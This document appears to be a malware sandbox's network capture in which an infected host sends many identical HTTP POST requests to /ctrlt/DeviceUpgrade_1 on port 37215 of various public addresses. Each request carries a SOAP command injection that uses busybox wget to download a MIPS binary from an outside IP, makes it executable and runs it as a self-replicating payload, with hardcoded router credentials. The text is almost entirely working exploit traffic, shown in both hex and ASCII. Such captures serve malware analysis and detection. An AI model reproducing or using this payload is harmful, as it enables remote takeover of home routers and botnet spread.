                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  508192.168.2.1336302157.200.243.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287678957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  509192.168.2.133493641.54.7.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287697077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  510192.168.2.1359770197.0.218.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287715912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  511192.168.2.133438641.173.3.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287734032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  512192.168.2.1352512197.246.71.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287751913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  513192.168.2.133280041.48.59.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287775040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  514192.168.2.1348192147.85.208.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287796974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  515192.168.2.1339628197.101.206.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287811041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  516192.168.2.1341764157.225.62.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287827969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  517192.168.2.1356072157.145.180.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287843943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 